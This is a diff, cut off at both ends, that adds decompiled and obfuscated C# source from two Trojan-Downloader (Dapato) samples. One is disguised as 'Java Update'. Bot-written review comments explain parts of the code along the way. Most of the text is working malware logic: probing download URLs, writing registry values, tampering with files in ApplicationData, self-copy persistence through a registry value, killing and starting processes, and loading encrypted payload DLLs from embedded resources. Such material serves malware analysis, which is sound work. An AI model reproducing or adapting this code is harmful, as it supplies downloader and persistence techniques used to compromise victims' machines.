obj2 = Math.Min(Math.Min(obj2, 32768 - obj0.\u0003), \u0003.\u0001.\u0001(obj1));
int num1 = 32768 - obj0.\u0002;
int num2;
if (obj2 > num1)
{
num2 = \u0003.\u0001.\u0001(obj1, obj0.\u0001, obj0.\u0002, num1);
if (num2 == num1)
num2 += \u0003.\u0001.\u0001(obj1, obj0.\u0001, 0, obj2 - num1);
}
else
num2 = \u0003.\u0001.\u0001(obj1, obj0.\u0001, obj0.\u0002, obj2);
obj0.\u0002 = obj0.\u0002 + num2 & (int) short.MaxValue;
obj0.\u0003 += num2;
return num2;
}
static int \u0001([In] \u0005.\u0003.\u0003 obj0) => 32768 - obj0.\u0003;
static bool \u0001([In] \u0005.\u0003.\u0001 obj0)
{
switch (obj0.\u0005)
{
case 2:
if (obj0.\u000F)
{
obj0.\u0005 = 12;
return false;
}
int num1 = \u0003.\u0001.\u0001(obj0.\u0010, 3);
if (num1 < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, 3);
if ((num1 & 1) != 0)
obj0.\u000F = true;
switch (num1 >> 1)
{
case 0:
\u0003.\u0001.\u0001(obj0.\u0010);
obj0.\u0005 = 3;
break;
case 1:
obj0.\u0013 = \u0005.\u0003.\u0004.\u0002;
obj0.\u0014 = \u0005.\u0003.\u0004.\u0003;
obj0.\u0005 = 7;
break;
case 2:
obj0.\u0012 = new \u0005.\u0003.\u0005();
obj0.\u0005 = 6;
break;
}
return true;
case 3:
if ((obj0.\u000E = \u0003.\u0001.\u0001(obj0.\u0010, 16)) < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, 16);
obj0.\u0005 = 4;
goto case 4;
case 4:
if (\u0003.\u0001.\u0001(obj0.\u0010, 16) < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, 16);
obj0.\u0005 = 5;
goto case 5;
case 5:
int num2 = \u0003.\u0001.\u0001(obj0.\u0011, obj0.\u0010, obj0.\u000E);
obj0.\u000E -= num2;
if (obj0.\u000E != 0)
return !\u0003.\u0001.\u0001(obj0.\u0010);
obj0.\u0005 = 2;
return true;
case 6:
if (!\u0003.\u0001.\u0001(obj0.\u0012, obj0.\u0010))
return false;
obj0.\u0013 = \u0003.\u0001.\u0001(obj0.\u0012);
obj0.\u0014 = \u0003.\u0001.\u0001(obj0.\u0012);
obj0.\u0005 = 7;
goto case 7;
case 7:
case 8:
case 9:
case 10:
return \u0003.\u0001.\u0001(obj0);
case 12:
return false;
default:
return false;
}
}
static int \u0001([In] \u0005.\u0003.\u0007 obj0) => obj0.ReadByte() | obj0.ReadByte() << 8;
static void \u0001([In] \u0005.\u0003.\u0003 obj0, [In] int obj1, [In] int obj2, [In] int obj3)
{
while (obj2-- > 0)
{
byte[] numArray = obj0.\u0001;
\u0005.\u0003.\u0003 obj = obj0;
int num1;
int num2 = num1 = obj.\u0002;
obj.\u0002 = num1 + 1;
int index = num2;
int num3 = (int) obj0.\u0001[obj1++];
numArray[index] = (byte) num3;
obj0.\u0002 &= (int) short.MaxValue;
obj1 &= (int) short.MaxValue;
}
}
static int \u0001([In] \u0005.\u0003.\u0007 obj0) => \u0003.\u0001.\u0001(obj0) | \u0003.\u0001.\u0001(obj0) << 16;
}
}
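Review bot: The method that takes a single `byte[]` and throws "Wrong Header Signature" / "Unknown Header" compares the header against bare decimal constants with no comment. `67324752` is `0x04034B50`, the ZIP local-file-header signature, and `8223355` is `0x7D7A7B`, the bytes `{z}`; the top byte of the header then selects the branch (1 = chunked data passed to what appears to be an inflate routine, 2 = DES, 3 = AES/Rijndael). Comments such as `// 0x04034B50: ZIP local file header "PK\x03\x04"` and `// low 24 bits 0x7D7A7B = "{z}", high byte = packing mode` would make this readable. The keys and IVs for modes 2 and 3 are constant arrays inside the method, so the encryption serves as obfuscation only and packed data can be recovered statically during analysis; the method header should state that. Elsewhere in the class, the helpers that call `Process.GetProcessesByName(...)` followed by `Kill()` and `Process.Start(...)` deserve one-line comments, because they are the behaviour-relevant parts among otherwise generic decompression code.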
@@ -0,0 +1,116 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0003;
using \u0004;
using \u0005;
using Microsoft.Win32;
using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0004
{
internal sealed class \u0001
{
private static bool \u0001 = true;
private static string[] \u0002 = new string[5]
{
\u0001.\u0001(860),
\u0001.\u0001(941),
\u0001.\u0001(1010),
\u0001.\u0001(1087),
\u0001.\u0001(1172)
};
private static string \u0003 = \u0001.\u0001(1249);
internal static bool \u0004 = false;
private static bool \u0005 = false;
private static void \u0001([In] string[] obj0)
{
\u0001.\u0001();
if (\u0001.\u0001)
;
if (false)
return;
\u0001.\u0001(2);
\u0001.\u0001(\u0001.\u0001(54));
string str1 = \u0001.\u0001(95);
\u0001.\u0001(\u0001.\u0001(96));
for (int index = 0; index < \u0001.\u0002.Length; ++index)
{
\u0001.\u0001(\u0001.\u0001(141) + \u0001.\u0002[index]);
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(new Uri(\u0001.\u0002[index]));
try
{
HttpWebResponse response = (HttpWebResponse) httpWebRequest.GetResponse();
if (response == null || response.StatusCode != HttpStatusCode.OK)
{
\u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(154));
}
else
{
\u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(199));
str1 = \u0001.\u0002[index];
break;
}
}
catch (Exception ex)
{
\u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(212));
}
}
\u0001.\u0001(20);
\u0001.\u0001(\u0001.\u0001(257));
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(\u0001.\u0001(330), true);
registryKey.SetValue(\u0001.\u0001(411), (object) 1, RegistryValueKind.DWord);
registryKey.SetValue(\u0001.\u0001(428), (object) 1, RegistryValueKind.DWord);
registryKey.SetValue(\u0001.\u0001(449), (object) str1, RegistryValueKind.String);
registryKey.Close();
\u0001.\u0001(\u0001.\u0001(470));
string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0001.\u0001(503);
\u0001.\u0001(\u0001.\u0001(540) + path);
string searchPattern = \u0001.\u0001(561);
\u0001.\u0001(10);
foreach (string directory in Directory.GetDirectories(path, searchPattern))
{
\u0001.\u0001(\u0001.\u0001(574) + directory);
if (System.IO.File.Exists(directory + \u0001.\u0001(607)))
{
\u0001.\u0001(\u0001.\u0001(620));
\u0001.\u0001(\u0001.\u0001(641));
StringBuilder stringBuilder = new StringBuilder();
foreach (string readAllLine in System.IO.File.ReadAllLines(directory + \u0001.\u0001(607)))
{
for (int index = 0; index < 5; ++index)
{
if (readAllLine.Contains(\u0001.\u0001(654) + index.ToString() + \u0001.\u0001(699)))
readAllLine.Replace(\u0001.\u0001(654) + index.ToString() + \u0001.\u0001(699), \u0001.\u0001(704));
}
stringBuilder.AppendLine(readAllLine);
}
stringBuilder.AppendLine(\u0001.\u0001(704));
System.IO.File.WriteAllText(directory + \u0001.\u0001(607), stringBuilder.ToString());
}
}
if (\u0001.\u0005)
{
string str2 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0001.\u0001(753);
if (!System.IO.File.Exists(str2))
{
Registry.CurrentUser.OpenSubKey(\u0001.\u0001(778), true).SetValue(\u0001.\u0001(839), (object) str2);
System.IO.File.Copy(Assembly.GetExecutingAssembly().Location, str2);
\u0001.\u0001(\u0001.\u0003);
}
}
else
\u0001.\u0001(\u0001.\u0003);
}
}
}
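Review bot: In the loop over `System.IO.File.ReadAllLines(...)`, the return value of `readAllLine.Replace(...)` is discarded, so every line is appended to the `StringBuilder` unchanged and the only modification written back is the extra line added by `stringBuilder.AppendLine(...)` after the loop. A comment there should record this, e.g. `// Replace() result is unused: existing lines are kept as-is, one line is appended each time the file is processed`, because it determines what the modified file looks like on an affected host. The method also writes two DWORD values and one string value (the first URL that answered 200 OK, otherwise the initial default) under an HKCU key opened for writing. All key, value and path names come from `\u0001.\u0001(n)` lookups that appear to be the string decoder in the last file section, so the concrete indicators have to be recovered from the embedded resource. The self-copy into ApplicationData with a second HKCU value is gated on the static `\u0005`, which is initialised to `false` in this file.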
@@ -0,0 +1,34 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0003;
using System;
using System.IO;
using System.Reflection;
namespace \u0004
{
internal sealed class \u0002 : IDisposable
{
internal readonly Type \u0001;
internal readonly object \u0002;
public \u0002()
{
try
{
this.\u0001 = Assembly.Load("System.Core, Version=2.0.5.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e").GetType("System.Security.Cryptography.AesManaged");
}
catch (FileNotFoundException ex)
{
this.\u0001 = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.RijndaelManaged");
}
this.\u0002 = Activator.CreateInstance(this.\u0001);
}
public void \u0001() => \u0001.\u0001(this);
}
}
@@ -0,0 +1,114 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0002;
using \u0003;
using \u0005;
using System;
using System.Collections;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0005
{
internal sealed class \u0001
{
private static readonly string \u0001 = "0";
private static readonly string \u0002 = "54";
private static readonly byte[] \u0003 = (byte[]) null;
private static readonly Hashtable \u0004 = (Hashtable) null;
private static readonly bool \u0005 = false;
private static readonly int \u0006 = 0;
[\u0001]
[\u0005.\u0002]
public static string \u0001([In] int obj0)
{
obj0 -= \u0001.\u0006;
if (\u0001.\u0005)
{
string str = (string) \u0001.\u0004[(object) obj0];
if (str != null)
return str;
}
int num1 = obj0;
byte[] numArray1 = \u0001.\u0003;
int index1 = num1;
int index2 = index1 + 1;
int num2 = (int) numArray1[index1];
int count;
if ((num2 & 128) == 0)
{
count = num2;
if (count == 0)
return string.Empty;
}
else if ((num2 & 64) == 0)
{
count = ((num2 & 63) << 8) + (int) \u0001.\u0003[index2++];
}
else
{
int num3 = (num2 & 31) << 24;
byte[] numArray2 = \u0001.\u0003;
int index3 = index2;
int num4 = index3 + 1;
int num5 = (int) numArray2[index3] << 16;
int num6 = num3 + num5;
byte[] numArray3 = \u0001.\u0003;
int index4 = num4;
int num7 = index4 + 1;
int num8 = (int) numArray3[index4] << 8;
int num9 = num6 + num8;
byte[] numArray4 = \u0001.\u0003;
int index5 = num7;
index2 = index5 + 1;
int num10 = (int) numArray4[index5];
count = num9 + num10;
}
try
{
byte[] bytes = Convert.FromBase64String(Encoding.UTF8.GetString(\u0001.\u0003, index2, count));
string str = string.Intern(Encoding.UTF8.GetString(bytes, 0, bytes.Length));
if (\u0001.\u0005)
{
try
{
\u0001.\u0004.Add((object) obj0, (object) str);
}
catch
{
}
}
return str;
}
catch
{
return (string) null;
}
}
static \u0001()
{
if (\u0001.\u0001 == "1")
{
\u0001.\u0005 = true;
\u0001.\u0004 = new Hashtable();
}
\u0001.\u0006 = Convert.ToInt32(\u0001.\u0002);
using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream("{1e4f9d46-a55d-4bde-840e-075123ccac58}"))
{
int int32 = Convert.ToInt32(manifestResourceStream.Length);
byte[] buffer = new byte[int32];
manifestResourceStream.Read(buffer, 0, int32);
\u0001.\u0003 = \u0001.\u0001(buffer);
manifestResourceStream.Close();
}
}
}
}
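Review bot: The decoder `\u0001(int)` is undocumented, yet every `\u0001.\u0001(NNN)` call in this sample goes through it, so the format deserves a header comment. From the code: the argument minus the constant parsed from `"54"` is an offset into the buffer built from resource `{1e4f9d46-a55d-4bde-840e-075123ccac58}`; a length prefix of one, two or four bytes follows, selected by bits `0x80` and `0x40` of the first byte; the payload is Base64 text whose decoded bytes are read as UTF-8. The buffer first passes through `\u0001.\u0001(buffer)`, which is outside this file (presumably the unzip routine). The same comment should say that the outer bare `catch` returns null for any bad offset, and that the static constructor calls `Stream.Read` once and ignores its return value.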
@@ -0,0 +1,14 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System;
namespace \u0005
{
internal sealed class \u0002 : Attribute
{
}
}
@@ -0,0 +1,342 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0003;
using System;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace \u0005
{
internal sealed class \u0003
{
internal sealed class \u0001
{
internal static readonly int[] \u0001 = new int[29]
{
3,
4,
5,
6,
7,
8,
9,
10,
11,
13,
15,
17,
19,
23,
27,
31,
35,
43,
51,
59,
67,
83,
99,
115,
131,
163,
195,
227,
258
};
internal static readonly int[] \u0002 = new int[29]
{
0,
0,
0,
0,
0,
0,
0,
0,
1,
1,
1,
1,
2,
2,
2,
2,
3,
3,
3,
3,
4,
4,
4,
4,
5,
5,
5,
5,
0
};
internal static readonly int[] \u0003 = new int[30]
{
1,
2,
3,
4,
5,
7,
9,
13,
17,
25,
33,
49,
65,
97,
129,
193,
257,
385,
513,
769,
1025,
1537,
2049,
3073,
4097,
6145,
8193,
12289,
16385,
24577
};
internal static readonly int[] \u0004 = new int[30]
{
0,
0,
0,
0,
1,
1,
2,
2,
3,
3,
4,
4,
5,
5,
6,
6,
7,
7,
8,
8,
9,
9,
10,
10,
11,
11,
12,
12,
13,
13
};
internal int \u0005;
internal int \u0006;
internal int \u0007;
internal int \u0008;
internal int \u000E;
internal bool \u000F;
internal \u0005.\u0003.\u0002 \u0010;
internal \u0005.\u0003.\u0003 \u0011;
internal \u0005.\u0003.\u0005 \u0012;
internal \u0005.\u0003.\u0004 \u0013;
internal \u0005.\u0003.\u0004 \u0014;
public \u0001([In] byte[] obj0)
{
this.\u0010 = new \u0005.\u0003.\u0002();
this.\u0011 = new \u0005.\u0003.\u0003();
this.\u0005 = 2;
\u0001.\u0001(obj0.Length, 0, obj0, this.\u0010);
}
}
internal sealed class \u0002
{
internal byte[] \u0001;
internal int \u0002 = 0;
internal int \u0003 = 0;
internal uint \u0004 = 0;
internal int \u0005 = 0;
}
internal sealed class \u0003
{
internal byte[] \u0001 = new byte[32768];
internal int \u0002 = 0;
internal int \u0003 = 0;
}
internal sealed class \u0004
{
internal short[] \u0001;
public static readonly \u0005.\u0003.\u0004 \u0002;
public static readonly \u0005.\u0003.\u0004 \u0003;
static \u0004()
{
byte[] numArray1 = new byte[288];
int num1 = 0;
while (num1 < 144)
numArray1[num1++] = (byte) 8;
while (num1 < 256)
numArray1[num1++] = (byte) 9;
while (num1 < 280)
numArray1[num1++] = (byte) 7;
while (num1 < 288)
numArray1[num1++] = (byte) 8;
\u0005.\u0003.\u0004.\u0002 = new \u0005.\u0003.\u0004(numArray1);
byte[] numArray2 = new byte[32];
int num2 = 0;
while (num2 < 32)
numArray2[num2++] = (byte) 5;
\u0005.\u0003.\u0004.\u0003 = new \u0005.\u0003.\u0004(numArray2);
}
public \u0004([In] byte[] obj0) => \u0001.\u0001(obj0, this);
}
internal sealed class \u0005
{
internal static readonly int[] \u0001 = new int[3]
{
3,
3,
11
};
internal static readonly int[] \u0002 = new int[3]
{
2,
3,
7
};
internal byte[] \u0003;
internal byte[] \u0004;
internal \u0005.\u0003.\u0004 \u0005;
internal int \u0006;
internal int \u0007;
internal int \u0008;
internal int \u000E;
internal int \u000F;
internal int \u0010;
internal byte \u0011;
internal int \u0012;
internal static readonly int[] \u0013;
static \u0005()
{
int[] numArray = new int[19];
// ISSUE: field reference
RuntimeFieldHandle fldHandle = __fieldref (\u0002.\u0002.\u0010);
if (true)
goto label_2;
label_1:
\u0005.\u0003.\u0005.\u0013 = numArray;
return;
label_2:
RuntimeHelpers.InitializeArray((Array) numArray, fldHandle);
goto label_1;
}
}
internal sealed class \u0006
{
private static readonly int[] \u0001 = new int[19]
{
16,
17,
18,
0,
8,
7,
9,
6,
10,
5,
11,
4,
12,
3,
13,
2,
14,
1,
15
};
internal static readonly byte[] \u0002 = new byte[16]
{
(byte) 0,
(byte) 8,
(byte) 4,
(byte) 12,
(byte) 2,
(byte) 10,
(byte) 6,
(byte) 14,
(byte) 1,
(byte) 9,
(byte) 5,
(byte) 13,
(byte) 3,
(byte) 11,
(byte) 7,
(byte) 15
};
private static readonly short[] \u0003 = new short[286];
private static readonly byte[] \u0004 = new byte[286];
private static readonly short[] \u0005;
private static readonly byte[] \u0006;
static \u0006()
{
if (true)
goto label_13;
label_2:
int index1;
for (; index1 < 144; \u0005.\u0003.\u0006.\u0004[index1++] = (byte) 8)
\u0005.\u0003.\u0006.\u0003[index1] = \u0001.\u0001(48 + index1 << 8);
for (; index1 < 256; \u0005.\u0003.\u0006.\u0004[index1++] = (byte) 9)
\u0005.\u0003.\u0006.\u0003[index1] = \u0001.\u0001(256 + index1 << 7);
for (; index1 < 280; \u0005.\u0003.\u0006.\u0004[index1++] = (byte) 7)
\u0005.\u0003.\u0006.\u0003[index1] = \u0001.\u0001(index1 - 256 << 9);
for (; index1 < 286; \u0005.\u0003.\u0006.\u0004[index1++] = (byte) 8)
\u0005.\u0003.\u0006.\u0003[index1] = \u0001.\u0001(index1 - 88 << 8);
\u0005.\u0003.\u0006.\u0005 = new short[30];
\u0005.\u0003.\u0006.\u0006 = new byte[30];
for (int index2 = 0; index2 < 30; ++index2)
{
\u0005.\u0003.\u0006.\u0005[index2] = \u0001.\u0001(index2 << 11);
\u0005.\u0003.\u0006.\u0006[index2] = (byte) 5;
}
return;
label_13:
index1 = 0;
goto label_2;
}
}
internal sealed class \u0007 : MemoryStream
{
public \u0007([In] byte[] obj0)
: base(obj0, false)
{
}
}
}
}
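Review bot: None of the lookup tables in this file is labelled, and they are recognisable: the four arrays in nested class `\u0001` match the DEFLATE (RFC 1951) length base, length extra-bits, distance base and distance extra-bits tables, and the 19-entry array in `\u0006` is the code-length alphabet order `16, 17, 18, 0, 8, ...`. A one-line comment on each, e.g. `// DEFLATE length base values (RFC 1951 §3.2.5)`, would tell a reader this is a stock inflater rather than custom logic. The static constructor of `\u0005` uses `__fieldref` with `RuntimeHelpers.InitializeArray`, which is decompiler output and not valid C#, so the 19 values of `\u0013` cannot be read from this listing; say so next to it. The `if (true) goto label_…` shapes are presumably control-flow obfuscation residue and do not change the result.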
@@ -0,0 +1 @@
{z}Ì«^­k–v¶ð[ƒ`Gø‚*¢ßQSÏϰ¶³¾û@ð–@…û¢BÏ<ùñ ­ž-ÀA‹uÁ4ŒK«Ÿ¨éh§8¥ Wÿ“y;ŠÇÍ¿œv$˜2¾0½…I*ïËlî¶ÇwÑ1ú§î&õ.z?̧U¬´„53–UÊN Jø˜ŸÝz‰ìÐwÓ&JB宫˱–‘
@@ -0,0 +1,16 @@
using SmartAssembly.Attributes;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Java Update")]
[assembly: AssemblyCopyright("Copyright © 2012")]
[assembly: AssemblyTitle("Java Update")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: Guid("3b4a5c85-91c9-4b3b-88d3-14814dd76514")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: PoweredBy("Powered by SmartAssembly 6.6.1.31")]
[assembly: AssemblyVersion("1.0.0.0")]
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: Java.Properties.Resources
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Java.Properties
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[CompilerGenerated]
[DebuggerNonUserCode]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) Java.Properties.Resources.resourceMan, (object) null))
Java.Properties.Resources.resourceMan = new ResourceManager("Java.Properties.Resources", typeof (Java.Properties.Resources).Assembly);
return Java.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Java.Properties.Resources.resourceCulture;
set => Java.Properties.Resources.resourceCulture = value;
}
}
}
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: Java.Properties.Settings
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Java.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.AssemblyResolver.AssemblyResolver
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
namespace SmartAssembly.AssemblyResolver
{
public sealed class AssemblyResolver
{
public static void AttachApp()
{
try
{
AssemblyResolverHelper.Attach();
}
catch (Exception ex)
{
}
}
}
}
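Review bot: `catch (Exception ex) { }` in `AttachApp` discards every failure and leaves `ex` unused; the same pattern appears in `AssemblyResolverHelper.Attach`, `ResourceResolver.AttachApp` and the obfuscated `\u0001.\u0001()` hook later in this commit. A resolver that failed to attach would therefore show up only later, as an unexplained load failure for the embedded assembly. If the swallow is deliberate, say so with `// best-effort: attach failures are intentionally ignored` and drop the unused variable (`catch (Exception)`).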
@@ -0,0 +1,206 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.AssemblyResolver.AssemblyResolverHelper
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using SmartAssembly.Zip;
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace SmartAssembly.AssemblyResolver
{
internal sealed class AssemblyResolverHelper
{
internal const string BindList = "{71461f04-2faa-4bb9-a0dd-28a79101b599}";
private const int MOVEFILE_DELAY_UNTIL_REBOOT = 4;
private static Hashtable hashtable = new Hashtable();
[DllImport("kernel32")]
private static extern bool MoveFileEx(string existingFileName, string newFileName, int flags);
internal static bool IsWebApplication
{
get
{
try
{
string lower = Process.GetCurrentProcess().MainModule.ModuleName.ToLower();
if (lower == "w3wp.exe")
return true;
if (lower == "aspnet_wp.exe")
return true;
}
catch
{
}
return false;
}
}
internal static void Attach()
{
try
{
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(AssemblyResolverHelper.ResolveAssembly);
}
catch
{
}
}
internal static Assembly ResolveAssembly(object sender, ResolveEventArgs e)
{
AssemblyResolverHelper.AssemblyInfo assemblyInfo = new AssemblyResolverHelper.AssemblyInfo(e.Name);
string base64String1 = Convert.ToBase64String(Encoding.UTF8.GetBytes(assemblyInfo.GetAssemblyFullName(false)));
string[] strArray = "ezA0ZDI2OWViLTIxZjAtNDMxMy04ODY1LTkzZjFjMWU2OWU5Yn0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{56ab1832-9ffe-43ad-8f8b-23253f3aef61},ezA0ZDI2OWViLTIxZjAtNDMxMy04ODY1LTkzZjFjMWU2OWU5Yn0=,[z]{56ab1832-9ffe-43ad-8f8b-23253f3aef61}".Split(',');
string str1 = string.Empty;
bool flag1 = false;
bool flag2 = false;
for (int index = 0; index < strArray.Length - 1; index += 2)
{
if (strArray[index] == base64String1)
{
str1 = strArray[index + 1];
break;
}
}
if (str1.Length == 0 && assemblyInfo.PublicKeyToken.Length == 0)
{
string base64String2 = Convert.ToBase64String(Encoding.UTF8.GetBytes(assemblyInfo.Name));
for (int index = 0; index < strArray.Length - 1; index += 2)
{
if (strArray[index] == base64String2)
{
str1 = strArray[index + 1];
break;
}
}
}
if (str1.Length > 0)
{
if (str1[0] == '[')
{
int num = str1.IndexOf(']');
string str2 = str1.Substring(1, num - 1);
flag1 = str2.IndexOf('z') >= 0;
flag2 = str2.IndexOf('t') >= 0;
str1 = str1.Substring(num + 1);
}
lock (AssemblyResolverHelper.hashtable)
{
if (AssemblyResolverHelper.hashtable.ContainsKey((object) str1))
return (Assembly) AssemblyResolverHelper.hashtable[(object) str1];
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str1);
if (manifestResourceStream != null)
{
int length = (int) manifestResourceStream.Length;
byte[] numArray = new byte[length];
manifestResourceStream.Read(numArray, 0, length);
if (flag1)
numArray = SimpleZip.Unzip(numArray);
Assembly assembly = (Assembly) null;
if (!flag2)
{
try
{
assembly = Assembly.Load(numArray);
}
catch (FileLoadException ex)
{
flag2 = true;
}
catch (BadImageFormatException ex)
{
flag2 = true;
}
}
if (flag2)
{
try
{
string str3 = string.Format("{0}{1}\\", (object) Path.GetTempPath(), (object) str1);
Directory.CreateDirectory(str3);
string str4 = str3 + assemblyInfo.Name + ".dll";
if (!File.Exists(str4))
{
FileStream fileStream = File.OpenWrite(str4);
fileStream.Write(numArray, 0, numArray.Length);
fileStream.Close();
AssemblyResolverHelper.MoveFileEx(str4, (string) null, 4);
AssemblyResolverHelper.MoveFileEx(str3, (string) null, 4);
}
assembly = Assembly.LoadFile(str4);
}
catch
{
}
}
AssemblyResolverHelper.hashtable[(object) str1] = (object) assembly;
return assembly;
}
}
}
return (Assembly) null;
}
internal struct AssemblyInfo
{
public string Name;
public Version Version;
public string Culture;
public string PublicKeyToken;
public string GetAssemblyFullName(bool includeVersion)
{
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append(this.Name);
if (includeVersion && this.Version != (Version) null)
{
stringBuilder.Append(", Version=");
stringBuilder.Append((object) this.Version);
}
stringBuilder.Append(", Culture=");
stringBuilder.Append(this.Culture.Length == 0 ? "neutral" : this.Culture);
stringBuilder.Append(", PublicKeyToken=");
stringBuilder.Append(this.PublicKeyToken.Length == 0 ? "null" : this.PublicKeyToken);
return stringBuilder.ToString();
}
public AssemblyInfo(string assemblyFullName)
{
this.Version = (Version) null;
this.Culture = string.Empty;
this.PublicKeyToken = string.Empty;
this.Name = string.Empty;
string str1 = assemblyFullName;
char[] chArray = new char[1]{ ',' };
foreach (string str2 in str1.Split(chArray))
{
string str3 = str2.Trim();
if (str3.StartsWith("Version="))
this.Version = new Version(str3.Substring(8));
else if (str3.StartsWith("Culture="))
{
this.Culture = str3.Substring(8);
if (this.Culture == "neutral")
this.Culture = string.Empty;
}
else if (str3.StartsWith("PublicKeyToken="))
{
this.PublicKeyToken = str3.Substring(15);
if (this.PublicKeyToken == "null")
this.PublicKeyToken = string.Empty;
}
else
